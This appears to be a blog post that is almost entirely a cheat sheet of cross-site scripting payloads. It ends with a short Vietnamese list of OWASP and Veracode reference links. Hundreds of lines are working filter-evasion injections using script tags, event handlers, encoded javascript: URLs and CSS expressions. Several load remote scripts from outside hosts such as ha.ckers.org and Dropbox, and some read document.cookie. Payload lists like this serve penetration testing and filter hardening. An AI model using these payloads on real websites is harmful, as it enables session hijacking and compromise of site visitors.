<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1)>>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src="	javascript:prompt(1)	">
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
"><h1/onmouseover='\u0061lert(1)'>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/	
 src=`~` onerror=prompt(1)>
<form><iframe 	
 src="javascript:alert(1)"
	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@ 
 onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea 
 onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	>
alert
(1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='https://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

<blink/
 onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript:
 javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061l&#101%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
<svg><script ?>alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061l&#101%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

Một số nguồn tham khảo về XSS

Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

DOM based XSS Prevention Cheat Sheet
https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet

Testing for Reflected Cross site scripting (OTG-INPVAL-001)
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Testing for Stored Cross site scripting (OTG-INPVAL-002)
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)

Testing for DOM-based Cross site scripting (OTG-CLIENT-001)
https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)

DOM Based XSS
https://www.owasp.org/index.php/DOM_Based_XSS

Cross-Site Scripting (XSS) Cheat Sheet | Veracode
https://www.veracode.com/security/xss

LEAVE A REPLY

Please enter your comment!
Please enter your name here